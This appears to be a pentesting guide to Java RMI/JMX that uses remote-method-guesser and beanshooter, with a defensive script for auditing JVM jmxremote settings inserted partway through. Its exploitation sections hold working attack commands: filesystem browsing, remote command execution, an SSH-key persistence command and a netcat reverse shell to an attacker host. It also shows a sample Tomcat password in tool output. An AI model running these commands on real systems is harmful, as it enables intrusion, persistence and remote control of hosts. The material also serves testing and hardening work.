# Pentesting Java RMI/JMX

## Discovery

```bash
# Nmap identifies RMI
nmap -sC -sV TARGET -p 1099,2222,9010

# Common RMI output
2222/tcp open  java-rmi   Java RMI
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
```

**Common Ports:**

* 1099 - Default RMI registry
* 2222 - Alternative RMI
* 9010 - JMX remote

***

## remote-method-guesser (rmg)

A tool for enumerating Java RMI endpoints and scanning them for known vulnerabilities.

### Installation

```bash
# Download release
wget https://github.com/qtc-de/remote-method-guesser/releases/download/v5.1.0/rmg-5.1.0-jar-with-dependencies.jar
```

### Enumeration

```bash
# Basic enumeration
java -jar rmg-5.1.0-jar-with-dependencies.jar enum TARGET 2222

# Output shows:
# - Bound names (jmxrmi)
# - Codebase enumeration
# - Security manager status
# - JEP 290 (deserialization filter) status
# - CVE-2019-2684 status
```

### Method Guessing

```bash
# Guess available methods
java -jar rmg-5.1.0-jar-with-dependencies.jar guess TARGET 2222

# Example output:
# [+] - jmxrmi
# [+]         --> String getVersion()
# [+]         --> javax.management.remote.rmi.RMIConnection newClient(Object params)
```

### Known Objects Info

```bash
# Get info on known RMI objects
java -jar rmg-5.1.0-jar-with-dependencies.jar known javax.management.remote.rmi.RMIServerImpl_Stub

# Lists the known vulnerabilities of that object, such as MLet and deserialization attacks
```

***

## Beanshooter (JMX Exploitation)

A JMX enumeration and attack tool.

### Installation

```bash
# Download release
wget https://github.com/qtc-de/beanshooter/releases/download/v4.1.0/beanshooter-4.1.0-jar-with-dependencies.jar

# Or build from source for full features (tonka shell)
sudo apt install maven
git clone https://github.com/qtc-de/beanshooter
cd beanshooter
mvn package
cd tonka-bean/
mvn package
```

### Enumeration

```bash
# Basic enumeration
java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum TARGET 2222

# Check for unauthorized access, deserialization, available MBeans
# [+] - Remote MBean server does not require authentication.
#       Vulnerability Status: Vulnerable
```
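The "does not require authentication" result above comes from how the JVM's remote JMX agent was started. The following is an added example, not part of this page, beanshooter or remote-method-guesser: a POSIX sh audit of a JVM command line for the JMX remote settings that produce that finding, shown against a constructed weak command line and a constructed hardened one. The `com.sun.management.jmxremote.*` property names are the real JVM system properties; the file paths in the hardened line are placeholders. It only sees the JVM-managed agent; a connector that an application starts itself needs its own review.

```shell
#!/bin/sh
# Audit a JVM command line for the JMX remote settings that make an
# unauthenticated, plaintext JMX endpoint possible.
# Added example: not part of beanshooter or remote-method-guesser.
# Property names are the real com.sun.management.jmxremote.* properties;
# the command lines below are constructed, not captured from a host.

# Print the value of -D<property>=<value> from a command line.
# The last occurrence wins, as it does in the JVM.
jmx_prop() {
    printf '%s\n' "$1" | tr ' ' '\n' | sed -n "s/^-D$2=//p" | tail -n 1
}

# Audit one command line. Prints each finding and returns the number of
# findings, so a return code of 0 means nothing weak was found.
audit_jmx_cmdline() {
    cmdline=$1
    findings=0
    port=$(jmx_prop "$cmdline" com.sun.management.jmxremote.port)
    if [ -z "$port" ]; then
        echo "no com.sun.management.jmxremote.port: JVM-managed remote JMX agent not enabled"
        return 0
    fi
    # Both properties default to true, so only an explicit "false" is weak.
    if [ "$(jmx_prop "$cmdline" com.sun.management.jmxremote.authenticate)" = false ]; then
        echo "FINDING: JMX on port $port with authentication disabled"
        findings=$((findings + 1))
    fi
    if [ "$(jmx_prop "$cmdline" com.sun.management.jmxremote.ssl)" = false ]; then
        echo "FINDING: JMX on port $port without TLS (credentials and MBean traffic in clear)"
        findings=$((findings + 1))
    fi
    return "$findings"
}

# Audit every running java process on the host. Not called at load time.
audit_running_jvms() {
    ps -eo args= | grep '^[^ ]*java ' | while IFS= read -r line; do
        echo "== $line" | cut -c1-120
        audit_jmx_cmdline "$line" || true
    done
}

# Constructed command lines: the weak form behind the beanshooter finding,
# and the hardened form with authentication, TLS and access/password files
# (paths are placeholders).
WEAK_JVM='java -Dcom.sun.management.jmxremote.port=9010 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -jar app.jar'
HARDENED_JVM='java -Dcom.sun.management.jmxremote.port=9010 -Dcom.sun.management.jmxremote.authenticate=true -Dcom.sun.management.jmxremote.password.file=/etc/app/jmxremote.password -Dcom.sun.management.jmxremote.access.file=/etc/app/jmxremote.access -Dcom.sun.management.jmxremote.ssl=true -Djavax.net.ssl.keyStore=/etc/app/jmx.jks -jar app.jar'

for c in "$WEAK_JVM" "$HARDENED_JVM"; do
    audit_jmx_cmdline "$c" && echo "OK: no weak JMX settings"
done
```

Run `audit_running_jvms` on a host to check live processes. The hardened line is the remediation for the finding: `authenticate=true` with a password and access file (the JVM refuses to start if the password file is readable by others, so keep it mode 600 and owned by the JVM user) and `ssl=true` backed by a keystore, so that the `jmxrmi` endpoint rmg and beanshooter find no longer accepts anonymous, cleartext connections.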

### Enumerate Tomcat Users via JMX

```bash
# If the JMX endpoint belongs to a Tomcat instance, the same enum action also lists its users
java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum TARGET 2222

# Output:
# [+] Enumerating tomcat users:
# [+]     - Listing 2 tomcat users:
# [+]             Username:  manager
# [+]             Password:  fhErvo2r9wuTEYiYgt
# [+]             Roles: manage-gui
```

### List MBeans

```bash
java -jar beanshooter-4.1.0-jar-with-dependencies.jar list TARGET 2222
java -jar beanshooter-4.1.0-jar-with-dependencies.jar info TARGET 2222
```

### File System Access via Model MBean

Deploy a Model MBean with java.io.File to enumerate the filesystem:

```bash
# Deploy MBean with java.io.File
java -jar beanshooter-4.1.0-jar-with-dependencies.jar model TARGET 2222 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'

# List directory contents
java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'list()'

# Change directory
java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'setManagedResource(Object a, String b)' 'new java.io.File("/home")' objectReference

# List new directory
java -jar beanshooter-4.1.0-jar-with-dependencies.jar invoke TARGET 2222 de.qtc.beanshooter:version=1 --signature 'list()'
```

### Remote Code Execution via StandardMBean

```bash
# Execute command (uses TemplateImpl payload)
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec 'whoami'

# Write SSH key
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec 'echo "ssh-ed25519 AAAA..." >> /home/user/.ssh/authorized_keys'

# Reverse shell (may need /bin/bash wrapper)
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 exec '/bin/bash -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER 9001 >/tmp/f"'
```

### Tonka Shell (Full Build Required)

```bash
# Deploy tonka
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard TARGET 2222 tonka

# Get interactive shell
java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell TARGET 2222
[tomcat@TARGET /]$ whoami
tomcat
```

***

## References

* <https://book.hacktricks.wiki/en/network-services-pentesting/1099-pentesting-java-rmi.html>
* <https://github.com/qtc-de/remote-method-guesser>
* <https://github.com/qtc-de/beanshooter>
